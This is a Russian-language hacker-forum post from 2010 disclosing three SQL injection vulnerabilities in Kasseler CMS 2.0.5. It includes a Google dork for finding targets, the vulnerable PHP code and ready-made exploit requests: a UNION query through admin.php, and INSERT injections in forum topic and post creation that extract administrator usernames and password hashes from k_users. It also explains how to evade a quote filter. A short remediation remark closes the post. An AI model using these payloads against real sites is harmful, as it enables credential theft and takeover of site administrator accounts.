Старый 26.08.2010, 02:04

Тесты проводились на Kasseler CMS 2.0.5

Дорк: "by Kasseler CMS. All rights reserved"

Обычно при подстановке кавычки «'» в любой параметр сервер отвечает ошибкой 403, поэтому полезную нагрузку лучше строить без кавычек: в примерах ниже используются числовые значения, 0x3a вместо ':' и обратный слеш, экранирующий закрывающую кавычку строкового литерала.

Уязвимость: Sqli

Sources files => categories.php, admin.php

Need: Admin rights (уязвимость постаутентификационная: нужен доступ в admin.php, так что практическая ценность ниже, чем у двух следующих; причина — $_GET['id'] подставляется в запрос без кавычек и без приведения к целому, поэтому достаточно UNION без кавычек).

PHP код:
function edit_categories($msg=""){
    global $main,$adminfile;
    if(!empty($msg)) warning($msg);

    $result=$main->db->sql_fetchrow($main->db->sql_query("SELECT *, substr(tree,1,length(tree)-2) as parent FROM ".CAT." WHERE cid={$_GET['id']}"));

    ...
Эксплуатация:

admin.php

GET => module=categories&do=edit&id=-1 union select 1,2,table_name,4,5,6,7,8 from information_schema.tables--+

Уязвимость: Inject INSERT

Sources files => posting.php

Need: - (достаточно прав на создание темы в форуме; в примере тест выполнен от учётной записи admin — см. topic_poster '1' и 'admin' в запросе ниже).

PHP код:
...

if($_GET['do']=='sendnewtopic') $msg .= ($timeout>time() AND !is_support()) ? str_replace('{TIME}', time2string($timeout-time()), $main->lang['timeoutpost']) : "";

if(empty($msg)){

    $_topic = array(
        'forum_id'          => $topic['forum_id'],
        'topic_title'       => substr($_POST['title'], 0, 149),
        'topic_desc'        => $_POST['desc'],
        'topic_poster'      => $main->user['uid'],
        'topic_time'        => date("U", strtotime(kr_date("Y-m-d H:i:s"))),
        'topic_poster_name' => $main->user['user_name'],
        'ico'               => $_POST['ico'],
        'topic_views'       => '0',
        'topic_type'        => empty($_POST['type']) ? "0" : $_POST['type']
    );

    if($_GET['do']=='sendnewtopic'){

        //Создаем новую тему
        sql_insert($_topic, TOPICS);

        //Узнаем сгенерированный ID темы
        list($topic_id) = $main->db->sql_fetchrow($main->db->sql_query("SELECT topic_id FROM ".TOPICS." WHERE topic_poster='{$main->user['uid']}' ORDER BY topic_id DESC LIMIT 1"));

        //Создаем первое сообщение темы
        sql_insert(array(
            'topic_id'     => $topic_id,
            'forum_id'     => $topic['forum_id'],
            'poster_id'    => $main->user['uid'],
            'post_time'    => date("U", strtotime(kr_date("Y-m-d H:i:s"))),
            'poster_ip'    => $ip,
            'post_subject' => substr($_POST['title'], 0, 149),
            'post_text'    => bb($_POST['message']),
            'poster_name'  => $main->user['user_name'],
            'ico'          => magic_quotes($_POST['ico'])
        ), POSTS);

        add_points($main->points['forum_topic']);

        //Узнаем сгенерированный ID сообщения
        list($post_id) = $main->db->sql_fetchrow($main->db->sql_query("SELECT post_id FROM ".POSTS." WHERE topic_id='{$topic_id}' AND poster_id='{$main->user['uid']}' ORDER BY post_id DESC LIMIT 1"));

        //Обновляем информацию о теме
        $main->db->sql_query("UPDATE ".TOPICS." SET topic_first_post_id='{$post_id}', topic_last_post_id='{$post_id}' WHERE topic_id='{$topic_id}'");

        //Обновляем информацию о форуме
        $main->db->sql_query("UPDATE ".FORUMS." SET forum_posts=forum_posts+1, forum_topics=forum_topics+1, forum_last_post_id='{$post_id}' WHERE forum_id='{$id}'");

...
/index.php?module=forum&do=sendnewtopic&id=2

POST

title=\\&desc=, (select group_concat(user_name,0x3a,user_password) from k_users where user_level=2), 1, 4, 4, 0, 0, 0)#&message=, 5555555, 55, 1)#&type=0&ico=&uploaddir=uploads%2Fforum%2Ffileda ta-admin%2F&update_upload_options=true&x=83&y=19

Первый запрос (INSERT в таблицу тем) мы завершаем через POST-параметр desc => "desc=, (inject), 1, 4, 4, 0, 0, 0)#". Обратный слеш в title экранирует закрывающую кавычку строкового литерала, поэтому содержимое desc оказывается вне кавычек и выполняется как SQL: title, desc и message передаются в sql_insert() без экранирования (через magic_quotes() проходит только ico). Числа после подзапроса заполняют оставшиеся столбцы (topic_poster, topic_time, topic_poster_name, ico, topic_views, topic_type), а «#» отбрасывает хвост запроса.

PHP код:
INSERT INTO `k_forum_topics` (`forum_id`, `topic_title`, `topic_desc`, `topic_poster`, `topic_time`, `topic_poster_name`, `ico`, `topic_views`, `topic_type`) VALUES ('2', '\', ', (select group_concat(user_name,0x3a,user_password) from k_users where user_level=2), 1, 4, 4, 0, 0, 0)#', '1', '1282220945', 'admin', '', '0', '0');
Второй запрос (INSERT в таблицу сообщений) мы завершаем через POST-параметр message => ", 5555555, 55, 1)#": post_subject снова получает '\', а числа заполняют post_text, poster_name и ico.

PHP код:
INSERT INTO `k_forum_posts` (`topic_id`, `forum_id`, `poster_id`, `post_time`, `poster_ip`, `post_subject`, `post_text`, `poster_name`, `ico`) VALUES ('62', '2', '1', '1282220982', 'sdsdsdsd', '\', ', 5555555, 55, 1)#', 'admin', '');
Второй INSERT нужно завершить корректно через message, чтобы он выполнился успешно, после него отработали UPDATE-запросы и тема с результатом подзапроса (поле topic_desc) отобразилась на форуме. Если второй INSERT завершится ошибкой, результат подзапроса останется только в базе, а на форуме такая тема не появится.

В общем, на выходе получаем логины и значения поля user_password всех учётных записей с user_level=2 (администраторов); скорее всего, это хеши, а не пароли в открытом виде. Исправление на стороне CMS — экранировать в sql_insert() все строковые значения (или перейти на подготовленные запросы), а не только ico, и приводить числовые поля к int.

Уязвимость: Inject INSERT

Sources files => posting.php,

Need: -

PHP код:
...

if(empty($msg)){

    if($_GET['do']=='sendnewpost'){

        //Создаем новое сообщение
        $new_post_id = sql_insert(array(
            'topic_id'     => $topic['topic_id'],
            'forum_id'     => $topic['forum_id'],
            'poster_id'    => $main->user['uid'],
            'post_time'    => date("U", strtotime(kr_date("Y-m-d H:i:s"))),
            'poster_ip'    => $ip,
            'post_subject' => !empty($_POST['title']) ? substr($_POST['title'], 0, 149) : addslashes(substr("Re:{$topic['topic_title']}", 0, 149)),
            'post_text'    => bb($_POST['message']),
            'poster_name'  => $main->user['user_name'],
            'ico'          => magic_quotes($_POST['ico'])
        ), POSTS);

...
Эксплуатация:

index.php?module=forum&do=showtopic&id=[id]

Создаем сообщение на форуме:

Заголовок сообщения => "\";

Текст сообщения => ", (select group_concat(user_name,0x3a,user_password) from k_users where user_level=2), 55555, 333)#"; механика та же: обратный слеш в заголовке экранирует закрывающую кавычку, подзапрос попадает в post_text, числа — в poster_name и ico. Обратите внимание, что addslashes() применяется только к автоматически сгенерированному заголовку "Re: ...", а к пользовательскому title — нет.

PHP код:
INSERT INTO `k_forum_posts` (`topic_id`, `forum_id`, `poster_id`, `post_time`, `poster_ip`, `post_subject`, `post_text`, `poster_name`, `ico`) VALUES ('65', '2', '1', '1282224667', '127.0.0.1', '\', ', (select group_concat(user_name,0x3a,user_password) from k_users where user_level=2), 55555, 333)#', 'admin', '');
(с)v1d0q
 